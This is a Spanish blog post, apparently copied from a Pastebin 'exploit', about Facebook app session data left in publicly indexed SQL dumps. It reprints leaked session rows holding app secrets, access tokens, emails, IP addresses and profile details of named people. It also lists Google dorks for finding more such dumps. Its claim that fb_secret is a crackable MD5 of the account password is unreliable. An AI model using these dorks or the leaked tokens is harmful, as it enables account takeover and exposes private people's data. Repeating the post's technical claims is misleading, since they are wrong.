Parámetros sensibles en los logs de sesiones de Facebook (Facebook session Exploit Priv8)

Viendo una entrada en Pastebin de Mauritania Attacker comprobamos el riesgo que tienen algunos logs de Facebook como `ci_sessions`, `WRITE` y otros, que son enviados por "login.facebook.com" a los servidores que usan diversos plugins y módulos de Facebook.

El problema es que estos logs contienen parámetros con información sensible de las cuentas usadas por los sitios web, entre ellos el hash de la contraseña en MD5 (texto ascii) lo que significa que puede ser descifrada sin problema ^_^ .

Estos parámetros son:

*fb_apiid
*fb_apikey
*fb_secret (Password of the Account in Hash MD5)
*fb_accesstoken
*fb_uservisitor
*facebook_id
*facebook_name
*facebook_first_name
*facebook_last_name
*facebook_link
*facebook_username
*facebook_hometown (tracer)
*facebook_location (tracer)


Un ejemplo de `ci_sessions` de Facebook:

"id\";s:1:\"1\";s:4:\"\";s:9:\"\";s:15:\"\";s:2:\"ar\";s:13:\"\";s:8:\"facebook\";s:8:\"fb_apiid\";s:15:\"223122544391265\";s:9:\"fb_apikey\";s:15:\"223122544391265\";s:9:\"fb_secret\";s:32:\"49c853d3d0718fd0419fd58ac183bbce\";s:3:\"url\";s:29:\"apps.facebook.com/oinstaller/\";s:18:\"status_visit_saved\";b:1;s:14:\"fb_accesstoken\";s:96:\"223122544391265|2.AQCOHzLLEQ5H_PqV.3600.1313622000.0-100001444879309|HrF0TGDVgG51z5Z8plmHNPiTXwA\";s:14:\"fb_uservisitor\";s:15:\"100001444879309\";s:11:\"facebook_id\";s:15:\"100001444879309\";s:13:\"facebook_name\";s:13:\"Owen Peredo D\";s:19:\"facebook_first_name\";s:4:\"Owen\";s:18:\"facebook_last_name\";s:8:\"Peredo D\";s:13:\"facebook_link\";s:34:\"http://www.facebook.com/owenperedo\";s:17:\"facebook_username\";s:10:\"owenperedo\";s:17:\"facebook_hometown\";O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"106257366076550\";s:4:\"\";s:19:\"Cochabamba, Bolivia\";}s:17:\"facebook_location\";O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"106257366076550\";s:4:\"\";s:19:\"Cochabamba, Bolivia\";}s:12:\"facebook_bio\";s:21:\"Alegre y divertido!!!\";s:13:\"facebook_work\";a:1:{i:0;O:8:\"stdClass\":5:{s:8:\"employer\";O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"145505632143902\";s:4:\"\";s:8:\"Sysdecom\";}s:8:\"location\";O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"106257366076550\";s:4:\"\";s:19:\"Cochabamba, Bolivia\";}s:8:\"position\";O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"131462966897408\";s:4:\"\";s:19:\"Gerente Propietario\";}s:11:\"description\";s:27:\"Systems development Company\";s:10:\"start_date\";s:7:\"2008-01\";}}s:15:\"facebook_sports\";a:1:{i:0;O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"103998839637434\";s:4:\"\";s:20:\"Association football\";}}s:23:\"facebook_favorite_teams\";a:1:{i:0;O:8:\"stdClass\":2:{s:2:\"id\";s:12:\"197394889304\";s:4:\"\";s:12:\"FC Barcelona\";}}s:26:\"facebook_favorite_athletes\";a:1:{i:0;O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"176063032413299\";s:4:\"\";s:9:\"Leo Messi\";}}s:29:\"facebook_inspirational_people\";a:1:{i:0;O:8:\"stdClass\":2:{s:2:\"id\";s:11:\"19987834992\";s:4:\"\";s:11:\"Hilary Duff\";}}s:18:\"facebook_education\";a:3:{i:0;O:8:\"stdClass\":2:{s:6:\"school\";O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"106494992721308\";s:4:\"\";s:24:\"joseph nicolas maldonado\";}s:4:\"type\";s:11:\"High School\";}i:1;O:8:\"stdClass\":2:{s:6:\"school\";O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"106233722748482\";s:4:\"\";s:4:\"UMSS\";}s:4:\"type\";s:7:\"College\";}i:2;O:8:\"stdClass\":3:{s:6:\"school\";O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"106462112722590\";s:4:\"\";s:30:\"Centro Boliviano Americano CBA\";}s:4:\"year\";O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"201638419856163\";s:4:\"\";s:4:\"2011\";}s:4:\"type\";s:7:\"College\";}}s:15:\"facebook_gender\";s:4:\"male\";s:17:\"facebook_timezone\";i:-4;s:15:\"facebook_locale\";s:5:\"en_US\";s:18:\"facebook_languages\";a:2:{i:0;O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"110343528993409\";s:4:\"\";s:7:\"Spanish\";}i:1;O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"106059522759137\";s:4:\"\";s:7:\"English\";}}s:17:\"facebook_verified\";b:1;s:21:\"facebook_updated_time\";s:24:\"2011-08-10T12:59:54+0000\";s:16:\"campaign_user_id\";s:1:\"5\";s:10:\"fanpage_id\";s:15:\"181056671916971\";s:5:\"liked\";b:1;s:7:\"user_id\";s:15:\"100001444879309\";s:10:\"user_token\";s:96:\"223122544391265|2.AQCOHzLLEQ5H_PqV.3600.1313622000.0-100001444879309|HrF0TGDVgG51z5Z8plmHNPiTXwA\";s:16:\"id_pageinstalled\";s:2:\"63\";s:14:\"isFanpageAdmin\";b:1;}'),('63207e3bb6293317511e1731de110bdc','186.22.142.214','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) App',1318966975,'a:31:{s:2:\"id\";s:1:\"1\";s:4:\"\";s:11:\"Frubis tabs\";s:15:\"\";s:2:\"ar\";s:13:\"\";s:8:\"facebook\";s:8:\"fb_apiid\";s:15:\"245451332140121\";s:9:\"fb_apikey\";s:15:\"245451332140121\";s:9:\"fb_secret\";s:32:\"01baa1f609949c21784fd5736835aad8\";s:3:\"url\";s:29:\"apps.facebook.com/frubistabs/\";s:18:\"status_visit_saved\";b:1;s:14:\"fb_accesstoken\";s:109:\"AAAB6hEsLCh4BAB1FXiROoo3QQ1HvUII6weseWOGxgxxX4u9zdtT82ZAjT9upMPx0fYFSTdaIbt5mnq6ghGHJkPEjOmeo1GOgWZCVnolwZDZD\";s:14:\"fb_uservisitor\";s:9:\"689991521\";s:11:\"facebook_id\";s:9:\"689991521\";s:13:\"facebook_name\";s:14:\"Matias O\'Keefe\";s:19:\"facebook_first_name\";s:6:\"Matias\";s:18:\"facebook_last_name\";s:7:\"O\'Keefe\";s:13:\"facebook_link\";s:37:\"http://www.facebook.com/matias.okeefe\";s:17:\"facebook_username\";s:13:\"matias.okeefe\";s:15:\"facebook_gender\";s:4:\"male\";s:14:\"facebook_email\";s:23:\"matias.okeefe@gmail.com\";s:17:\"facebook_timezone\";i:-3;s:15:\"facebook_locale\";s:5:\"es_LA\";s:17:\"facebook_verified\";b:1;s:21:\"facebook_updated_time\";s:24:\"2011-10-17T12:06:55+0000\";s:16:\"campaign_user_id\";i:7;s:10:\"fanpage_id\";s:15:\"146715982029180\";s:5:\"liked\";b:1;s:7:\"user_id\";s:9:\"689991521\";s:10:\"user_token\";s:109:\"AAAB6hEsLCh4BAB1FXiROoo3QQ1HvUII6weseWOGxgxxX4u9zdtT82ZAjT9upMPx0fYFSTdaIbt5mnq6ghGHJkPEjOmeo1GOgWZCVnolwZDZD\";s:16:\"id_pageinstalled\";N;s:14:\"isFanpageAdmin\";b:0;s:11:\"fanpage_url\";s:60:\"http://www.facebook.com/HeladosChungo?sk=app_245451332140121\";}'),('b20a63bc8a68f130feb7321c58b56d8d','190.244.13.94','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:7.',1318967000,'a:30:{s:2:\"id\";s:1:\"1\";s:4:\"\";s:11:\"Frubis tabs\";s:15:\"\";s:2:\"ar\";s:13:\"\";s:8:\"facebook\";s:8:\"fb_apiid\";s:15:\"245451332140121\";s:9:\"fb_apikey\";s:15:\"245451332140121\";s:9:\"fb_secret\";s:32:\"01baa1f609949c21784fd5736835aad8\";s:3:\"url\";s:29:\"apps.facebook.com/frubistabs/\";s:18:\"status_visit_saved\";b:1;s:14:\"fb_accesstoken\";s:114:\"AAAB6hEsLCh4BADXOQ8vp0cUYZBGYTe9eSHygszNz7ogX0qBFNm2I2JAexwCtdDcQd7pPcX7EUB0XE5K8asIaMDRAFlQ4DiLfpeC9fxsit494Ev5c6\";s:14:\"fb_uservisitor\";s:15:\"100000365619835\";s:11:\"facebook_id\";s:15:\"100000365619835\";s:13:\"facebook_name\";s:13:\"House Gregory\";s:19:\"facebook_first_name\";s:5:\"House\";s:18:\"facebook_last_name\";s:7:\"Gregory\";s:13:\"facebook_link\";s:54:\"http://www.facebook.com/profile.php?id=100000365619835\";s:15:\"facebook_gender\";s:4:\"male\";s:14:\"facebook_email\";s:20:\"sfarsuau@hotmail.com\";s:17:\"facebook_timezone\";i:-3;s:15:\"facebook_locale\";s:5:\"en_US\";s:17:\"facebook_verified\";b:1;s:21:\"facebook_updated_time\";s:24:\"2011-10-06T22:24:58+0000\";s:16:\"campaign_user_id\";i:8;s:10:\"fanpage_id\";s:15:\"146715982029180\";s:5:\"liked\";b:0;s:7:\"user_id\";s:15:\"100000365619835\";s:10:\"user_token\";s:114:\"AAAB6hEsLCh4BADXOQ8vp0cUYZBGYTe9eSHygszNz7ogX0qBFNm2I2JAexwCtdDcQd7pPcX7EUB0XE5K8asIaMDRAFlQ4DiLfpeC9fxsit494Ev5c6\";s:16:\"id_pageinstalled\";N;s:14:\"isFanpageAdmin\";b:0;s:11:\"fanpage_url\";s:60:\"http://www.facebook.com/HeladosChungo?sk=app_245451332140121\";}'),('9f82abf03ee6c9c9c052d306452b72d2','200.125.109.35','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KH',1318967163,'a:19:{s:2:\"id\";s:1:\"1\";s:4:\"\";s:11:\"Frubis tabs\";s:15:\"\";s:2:\"ar\";s:13:\"\";s:8:\"facebook\";s:8:\"fb_apiid\";s:15:\"245451332140121\";s:9:\"fb_apikey\";s:15:\"245451332140121\";s:9:\"fb_secret\";s:32:\"01baa1f609949c21784fd5736835aad8\";s:3:\"url\";s:29:\"apps.facebook.com/frubistabs/\";s:18:\"status_visit_saved\";b:1;s:14:\"fb_accesstoken\";s:0:\"\";s:14:\"fb_uservisitor\";s:0:\"\";s:16:\"campaign_user_id\";s:0:\"\";s:10:\"fanpage_id\";s:15:\"146715982029180\";s:5:\"liked\";b:0;s:7:\"user_id\";s:0:\"\";s:10:\"user_token\";s:0:\"\";s:16:\"id_pageinstalled\";N;s:14:\"isFanpageAdmin\";b:0;s:11:\"fanpage_url\";s:60:\"http://www.facebook.com/HeladosChungo?sk=app_245451332140121\";}'),('bab185c44a703272b8324c3915e14f45','190.16.128.144','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) App',1319156401,'a:30:{s:2:\"id\";s:1:\"1\";s:4:\"\";s:11:\"Frubis tabs\";s:15:\"\";s:2:\"ar\";s:13:\"\";s:8:\"facebook\";s:8:\"fb_apiid\";s:15:\"245451332140121\";s:9:\"fb_apikey\";s:15:\"245451332140121\";s:9:\"fb_secret\";s:32:\"01baa1f609949c21784fd5736835aad8\";s:3:\"url\";s:29:\"apps.facebook.com/frubistabs/\";s:18:\"status_visit_saved\";b:1;s:14:\"fb_accesstoken\";s:119:\"AAAB6hEsLCh4BAID3FIcZB1aYt8df7W853hvRCCPXZB4ktWLUpLyWEpynMQNFZCTjxCvCmOmnLktygK583TNAzeiWgEpAZAlNERYiiQZCftm6kbZCij0vE8\";s:14:\"fb_uservisitor\";s:15:\"100001952113675\";s:11:\"facebook_id\";s:15:\"100001952113675\";s:13:\"facebook_name\";s:11:\"Enzo Sifrub\";s:19:\"facebook_first_name\";s:4:\"Enzo\";s:18:\"facebook_last_name\";s:6:\"Sifrub\";s:13:\"facebook_link\";s:54:\"http://www.facebook.com/profile.php?id=100001952113675\";s:15:\"facebook_gender\";s:4:\"male\";s:14:\"facebook_email\";s:31:\"francisco.valenzuela@frubis.com\";s:17:\"facebook_timezone\";i:-3;s:15:\"facebook_locale\";s:5:\"es_LA\";s:17:\"facebook_verified\";b:1;s:21:\"facebook_updated_time\";s:24:\"2011-10-20T14:53:31+0000\";s:16:\"campaign_user_id\";i:9;s:10:\"fanpage_id\";s:15:\"146715982029180\";s:5:\"liked\";b:1;s:7:\"user_id\";s:15:\"100001952113675\";s:10:\"user_token\";s:119:\"AAAB6hEsLCh4BAID3FIcZB1aYt8df7W853hvRCCPXZB4ktWLUpLyWEpynMQNFZCTjxCvCmOmnLktygK583TNAzeiWgEpAZAlNERYiiQZCftm6kbZCij0vE8\";s:16:\"id_pageinstalled\";N;s:14:\"isFanpageAdmin\";b:0;s:11:\"fanpage_url\";s:60:\"http://www.facebook.com/HeladosChungo?sk=app_245451332140121\";}'),('3a6f810a85da6f7045d88aad108f33f3','190.224.151.198','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KH',1319156419,'a:31:{s:2:\"id\";s:1:\"1\";s:4:\"\";s:11:\"Frubis tabs\";s:15:\"\";s:2:\"ar\";s:13:\"\";s:8:\"facebook\";s:8:\"fb_apiid\";s:15:\"245451332140121\";s:9:\"fb_apikey\";s:15:\"245451332140121\";s:9:\"fb_secret\";s:32:\"01baa1f609949c21784fd5736835aad8\";s:3:\"url\";s:29:\"apps.facebook.com/frubistabs/\";s:18:\"status_visit_saved\";b:1;s:14:\"fb_accesstoken\";s:117:\"AAAB6hEsLCh4BAA8FKmqrg6p8CG0D5FZA8FXwStCsrZBnrEZCVQlbY6BynCZBS1QNyBdD5q3zXwt51WUMYtrUPPAuUXE5epaPFKlXOV6XpQMvNA7a3srP\";s:14:\"fb_uservisitor\";s:10:\"1089777996\";s:11:\"facebook_id\";s:10:\"1089777996\";s:13:\"facebook_name\";s:17:\"Luciano Balmaceda\";s:19:\"facebook_first_name\";s:7:\"Luciano\";s:18:\"facebook_last_name\";s:9:\"Balmaceda\";s:13:\"facebook_link\";s:39:\"http://www.facebook.com/lucho.balmaceda\";s:17:\"facebook_username\";s:15:\"lucho.balmaceda\";s:15:\"facebook_gender\";s:4:\"male\";s:14:\"facebook_email\";s:27:\"lucho.balmaceda@hotmail.com\";s:17:\"facebook_timezone\";i:-3;s:15:\"facebook_locale\";s:5:\"es_LA\";s:17:\"facebook_verified\";b:1;s:21:\"facebook_updated_time\";s:24:\"2011-10-19T14:48:37+0000\";s:16:\"campaign_user_id\";i:10;s:10:\"fanpage_id\";s:15:\"146715982029180\";s:5:\"liked\";b:1;s:7:\"user_id\";s:10:\"1089777996\";s:10:\"user_token\";s:117:\"AAAB6hEsLCh4BAA8FKmqrg6p8CG0D5FZA8FXwStCsrZBnrEZCVQlbY6BynCZBS1QNyBdD5q3zXwt51WUMYtrUPPAuUXE5epaPFKlXOV6XpQMvNA7a3srP\";s:16:\"id_pageinstalled\";N;s:14:\"isFanpageAdmin\";b:0;s:11:\"fanpage_url\";s:60:\"http://www.facebook.com/HeladosChungo?sk=app_245451332140121\";}');
Un ejemplo de sesión `WRITE` de Facebook:
(6,'fbsecret','823215e0b822191b1451b7f48f877dd5'),
(5,'fbapi','ffc4ba57627eebfd1d41ca7d7107123e'),
(7,'pageid','188846611127079'),
(8,'pagename','St Maria Goretti Church'),
(9,'pagetoken','122582234479418|a17360823010b076c960588f-58100826|188846611127079|F7ae3Q3oYkZsu6TwJls-7EZx8PM'),
(10,'Cancellations','2'),
(11,'Bulletins','3'),
(12,'Cancellations/Delays','4'),
(13,'Church Blog','')

Y algunos dorks que puedes usar (o crear los tuyos propios):

Dork1: ext:sql "fb_secret\"
Dork2: ext:sql "fb_username\"
Dork3: ext:sql "fb_id\"
Dork4: ext:sql "fb_secret\" ci_sessions
Dork5 : ext:sql "fb_secret\" WRITE

Ten en cuenta que casi todos los CMS como "Wordpress" , "Joomla" , "Drupal" , etc..  y otros sitios web tienen este bug y es posible encontrar esta información en otras extensiones de archivo:

"sql" , "xml" , "dat" , "txt"

Por ejemplo, información sensible en Twitter : http://www.hackerzadda.com/2013/05/twitter-exploit-priv8-2013.html

0 comentarios :

Publicar un comentario en la entrada